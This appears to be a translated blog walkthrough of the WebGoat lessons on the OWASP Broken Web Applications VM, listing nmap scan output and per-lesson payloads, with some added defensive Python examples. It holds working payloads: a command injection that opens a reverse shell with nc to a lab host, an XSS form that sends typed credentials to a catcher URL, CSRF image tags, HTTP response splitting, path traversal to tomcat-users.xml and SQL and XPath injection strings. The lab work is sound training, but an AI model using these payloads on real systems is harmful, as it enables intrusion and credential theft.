WebGoat on owaspbwa

☆樱花仙子☆ submitted on 2019-11-30 08:17:15

Introduction

Download: https://sourceforge.net/projects/owaspbwa/files/

GitHub: https://github.com/chuckfw/owaspbwa/wiki/UserGuide

0x001 Reconnaissance

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 5.3p1 Debian 3ubuntu4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 ea:83:1e:45:5a:a6:8c:43:1c:3c:e3:18:dd:fc:88:a5 (DSA)
|_  2048 3a:94:d8:3f:e0:a2:7a:b8:c3:94:d7:5e:00:55:0c:a7 (RSA)
80/tcp   open  http        Apache httpd 2.2.14 ((Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL...)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
|_http-title: owaspbwa OWASP Broken Web Applications
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Courier Imapd (released 2008)
|_imap-capabilities: UIDPLUS THREAD=ORDEREDSUBJECT THREAD=REFERENCES completed IDLE QUOTA OK CAPABILITY ACL ACL2=UNIONA0001 CHILDREN IMAP4rev1 SORT NAMESPACE
443/tcp  open  ssl/https?
|_ssl-date: 2018-12-17T06:55:14+00:00; 0s from scanner time.
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
5001/tcp open  java-rmi    Java RMI
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Site doesn't have a title.
8081/tcp open  http        Jetty 6.1.25
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Jetty(6.1.25)
|_http-title: Choose Your Path
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5001-TCP:V=7.70%I=7%D=12/17%Time=5C174849%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4,"\xac\xed\0\x05");
MAC Address: F4:B7:E2:01:6D:06 (Hon Hai Precision Ind.)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.17 - 2.6.36
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: OWASPBWA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

0x002 General

HTTP server cache exploitation (HTTP Splitting)

# response to a request sent to the server
HTTP/1.1 302 Moved Temporarily
Date: Mon, 17 Dec 2018 14:21:31 GMT
Server: Apache-Coyote/1.1
Location: http://192.168.1.104/WebGoat/attack?Screen=3&menu=100&fromRedirect=yes&language=en # the injection point is the language parameter here
Content-Type: text/html;charset=ISO-8859-1
Via: 1.1 127.0.1.1
Vary: Accept-Encoding
Content-Length: 0
Connection: close

Construct the malicious payload (two equivalent encodings):

en%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0aInsert undesireable content here
en%0d%0aContent-length%3a+0%0d%0a%0d%0aHTTP%2f1.1+200+OK%0d%0aContent-Type%3a+text%2fhtml%3b%0d%0aLast-Modified%3a+Thu%2c+01+Jan+2099+12%3a00%3a00+GMT+%0d%0aContent-length%3a+19%0d%0a%0d%0a%26lt%3bhtml%26gt%3bhacked%26lt%3b%2fhtml%26gt%3b

0x003 Access Control Flaws

Bypass a Path Based Access Control Scheme

../../../../../../../etc/tomcat6/tomcat-users.xml
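A defender-side check for the traversal above, added here as an example rather than WebGoat's own code: it normalises the requested name under a document root and refuses anything that resolves outside it. The root path, the file name intro.html and the function names are assumptions for this example.

```python
import posixpath
from typing import Optional

# Constructed document root for this example; it is not WebGoat's real layout.
DOC_ROOT = "/var/lib/tomcat6/webapps/WebGoat/lesson_plans"


def resolve_under_root(root: str, requested: str) -> Optional[str]:
    """Return the normalised absolute path of `requested` inside `root`,
    or None when the path is absolute or escapes the root via '..'.

    posixpath is used so the check behaves like a Unix server on any host.
    normpath works on the string only; a real deployment should also resolve
    symlinks (os.path.realpath) before the containment comparison."""
    root = posixpath.normpath(root)
    # An absolute user path would replace the root inside join(); refuse it outright.
    if posixpath.isabs(requested) or "\x00" in requested:
        return None
    # Collapse '.' and '..' components, then require the result to stay under root.
    candidate = posixpath.normpath(posixpath.join(root, requested))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def serve_lesson_file(requested: str) -> str:
    """Tiny dispatcher: 'ok:<path>' for contained paths, 'denied' otherwise."""
    path = resolve_under_root(DOC_ROOT, requested)
    return "denied" if path is None else "ok:" + path


if __name__ == "__main__":
    # The lesson's traversal payload versus a constructed benign file name.
    print(serve_lesson_file("../../../../../../../etc/tomcat6/tomcat-users.xml"))  # denied
    print(serve_lesson_file("intro.html"))  # ok:/var/lib/tomcat6/webapps/WebGoat/lesson_plans/intro.html
```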

LAB: Role Based Access Control

employee_id=105&action=ViewProfile # after logging in, change ViewProfile to DeleteProfile

0x004

Stage 1: Bypass Presentational Layer Access Control

Log in as the user Tom (lowercase password), click ViewProfile, then intercept the request and modify the data so that Tom gains the DeleteProfile permission:


employee_id=105&action=ViewProfile  # change ViewProfile to DeleteProfile

Stage 2: Add Business Layer Access Control

Modify the relevant code in the class org.owasp.webgoat.lessons.RoleBasedAccessControl.RoleBasedAccessControl.java

Modify the handleRequest method:

//***************CODE HERE*************************
// Reject the request unless the current user is authorized for the requested action
if (!isAuthorized(s, getUserId(s), requestedActionName))
{
    throw new UnauthorizedException();
}
//*************************************************

Stage 3: Breaking Data Layer Access Control

Log in as Tom with the lowercase password tom, then intercept the request and change the ID to Jerry's ID, 101:


employee_id=105&action=ViewProfile  # change the employee_id to 101

Stage 4: Add Data Layer Access Control

0x005 Ajax Security

LAB: DOM-Based Cross-Site Scripting

STAGE 1:

<IMG SRC="images/logos/owasp.jpg"/>

STAGE 2:

<img src=x onerror=;;alert('XSS') />

STAGE 3:

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

STAGE 4:

Please enter your password:<BR><input type = "password" name="pass"/><button
onClick="javascript:alert('I have your password: ' +
pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR>
<BR><BR><BR><BR><BR><BR><BR><BR> 

DOM Injection

Intercept the response and modify the body content:

document.form.SUBMIT.disabled = false;

XML Injection

<root>
<reward>WebGoat Core Duo Laptop 2000 Pts</reward>
<reward>WebGoat Hawaii Cruise 3000 Pts</reward> 
</root>

JSON Injection

Burp Suite setting: Proxy - Options - Intercept Server Responses, enable the response interception option.

Intercept and modify the JSON data:

{
"From": "Boston",
"To": "Seattle", 
"flights": [
{"stops": "0", "transit" : "N/A", "price": "$600"}, // modify freely
{"stops": "2", "transit" : "Newark,Chicago", "price": "$300"} // modify freely
]
}

Silent Transactions Attacks

Look at the page source: there are two key JavaScript functions, processData() and submitData().

// enter in the browser's address bar:
javascript:submitData(16666000,100000)

Dangerous Use of Eval

123');alert(document.cookie);(' 

Insecure Client Storage

Select the item to purchase, intercept the request with Burp and change the amount to 0.

0x006 Authentication Flaws

Basic Authentication

Authorization
guest:guest

Multi Level Login 1

STAGE 1

// log in with username and password
Username: Jane, password: tarzan
TAN 15648

STAGE 2

Username: Jane, password: tarzan
TAN 15648

Intercept with Burp and change the hidden_tan value to 1:
hidden_tan=1&tan=15648&Submit=Submit 

0x008 Buffer Overflows

Off-by-One Overflows

// fill in anything
test
test
123
// intercept the request and send it to Intruder
249.99+-+24+hours&SUBMIT=Accept+Terms&last_name=test&first_name=test&room_no=§123§
// character blocks payload settings
base string: 3
min length: 1024
max length: 1024000
step: 1024 

0x009 Code Quality

Discover Clues in the HTML

The username and password can be found in the comments in the page source:

<!-- FIXME admin:adminpw  --><!-- Use Admin to regenerate database  -->

0x010 Concurrency

Thread Safety Problems

// two users: open the same page in two browser tabs and submit at the same time; you will see the other user's information
jeff
dave

Shopping Cart Concurrency Flaw

Select the product to purchase, open two pages and submit them simultaneously.

0x011 Cross-Site Scripting (XSS)

Phishing with XSS (using BeEF makes this quicker and more convenient)

<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.forms[0].user.value + "Password = " + document.forms[0].pass.value); XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+document.forms[0].user.value + "&password=" + document.forms[0].pass.value + "";}
</script><form><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>

LAB: Cross Site Scripting

<script>alert(document.cookie);</script>

Stored XSS Attacks

Stored XSS can hit the site's back end and obtain passwords; combined with BeEF it is even more powerful.

<script language="javascript" type="text/javascript">alert(document.cookie);</script>

Cross Site Request Forgery (CSRF)

<img src="http://localhost/WebGoat/attack?Screen=81&menu=210&transferFunds=5000" width="1"
height="1" />

CSRF Prompt By-Pass

<img src="http://localhostattack?Screen=81&menu=210&transferFunds=5000" onerror="document.getElementById('image2').src='http://localhostattack?Screen=81&menu=210&transferFunds=CONFIRM'" width="1" height="1" />
<img id="image2" width="1" height="1" />

Cross Site Tracing (XST) Attacks

<script type="text/javascript">
if ( navigator.appName.indexOf("Microsoft") !=-1) {
  var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
  xmlHttp.open("TRACE", "./", false);
  xmlHttp.send();
  str1=xmlHttp.responseText;
  while (str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br>");
  document.write(str1);
}
</script>

0x012 Improper Error Handling

Fail Open Authentication Scheme

Intercept with Burp and delete the password field.

0x013 Injection Flaws

Command Injection

" 127.0.0.1 && nc -vn  192.168.1.101 4444 -e /bin/bash

Numeric SQL Injection

or 1=1

Log Spoofing

Smith%0d%0aLogin Succeeded for username: admin
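One block covering both the HTTP Splitting payload (0x002) and the Log Spoofing payload just above, added as an example that is not WebGoat's code: it decodes the lesson's values, shows that echoing the unvalidated language parameter into Location puts a second HTTP response into the byte stream, and then applies two defensive rules, rejecting CR/LF in header values and escaping them in log fields. The response template and the function names are assumptions for this example.

```python
from urllib.parse import unquote_plus

# The two lesson payloads quoted above (HTTP Splitting and Log Spoofing), verbatim.
SPLIT_PAYLOAD = ("en%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a"
                 "Content-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a"
                 "Insert undesireable content here")
LOG_PAYLOAD = "Smith%0d%0aLogin Succeeded for username: admin"


def decode_param(raw: str) -> str:
    """Percent-decode a query parameter the way the servlet container does."""
    return unquote_plus(raw)

def build_redirect_unsafe(language: str) -> str:
    """Echo the decoded parameter straight into Location, as the vulnerable lesson does."""
    return ("HTTP/1.1 302 Moved Temporarily\r\n"
            f"Location: http://192.168.1.104/WebGoat/attack?Screen=3&menu=100&language={language}\r\n"
            "Content-Length: 0\r\n\r\n")

def count_responses(stream: str) -> int:
    """How many HTTP status lines a proxy or cache parsing this stream would see."""
    return sum(1 for line in stream.split("\r\n") if line.startswith("HTTP/1."))

def header_value(value: str) -> str:
    """Hardened rule: refuse any header value that contains CR or LF."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF not allowed in header value")
    return value

def build_redirect_safe(language: str):
    """Hardened form: None (caller answers 400) instead of a split response."""
    try:
        return build_redirect_unsafe(header_value(language))
    except ValueError:
        return None

def log_field(value: str) -> str:
    """Escape line breaks so one event can never masquerade as two log lines."""
    return value.replace("\r", "\\r").replace("\n", "\\n")

def login_failed_line(username: str, safe: bool) -> str:
    """The lesson's log message, with or without the neutralising step."""
    name = log_field(username) if safe else username
    return "Login failed for username: " + name
```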

XPATH Injection

Smith' or 1=1 or 'a'='a

String SQL Injection

' or 1=1 --

LAB: SQL Injection

smith' or '1' = '1
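The three SQL payloads above (`or 1=1`, `' or 1=1 --`, `smith' or '1' = '1`) run against a constructed in-memory SQLite table, added here as an example rather than WebGoat's own code, with the concatenating query beside its parameterised replacement for both the string and the numeric case. The table name, its columns and the function names are assumptions.

```python
import sqlite3
from typing import List, Optional


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the lesson's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_data (userid INTEGER, last_name TEXT)")
    conn.executemany("INSERT INTO user_data VALUES (?, ?)",
                     [(101, "Smith"), (102, "Jones"), (103, "Brown")])
    return conn

def lookup_unsafe(conn, last_name: str) -> List[str]:
    """String concatenation, as in the vulnerable lesson form: a quote in the
    input closes the literal and the rest becomes SQL."""
    sql = "SELECT last_name FROM user_data WHERE last_name = '" + last_name + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, last_name: str) -> List[str]:
    """Parameterised query: the whole input is bound as one string value."""
    return [row[0] for row in conn.execute(
        "SELECT last_name FROM user_data WHERE last_name = ?", (last_name,))]

def lookup_by_id_unsafe(conn, userid: str) -> List[str]:
    """Numeric concatenation: no quote to break out of, so 'or 1=1' works directly."""
    sql = "SELECT last_name FROM user_data WHERE userid = " + userid
    return [row[0] for row in conn.execute(sql)]

def lookup_by_id_safe(conn, userid: str) -> Optional[List[str]]:
    """Validate the type first, then bind; None means 'reject the request'."""
    if not userid.isdigit():
        return None
    return [row[0] for row in conn.execute(
        "SELECT last_name FROM user_data WHERE userid = ?", (int(userid),))]


if __name__ == "__main__":
    db = make_db()
    print(lookup_unsafe(db, "smith' or '1' = '1"))  # all three rows
    print(lookup_safe(db, "smith' or '1' = '1"))    # []
    print(lookup_by_id_unsafe(db, "101 or 1=1"))    # all three rows
    print(lookup_by_id_safe(db, "101 or 1=1"))      # None
```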

 

​​​​​​​
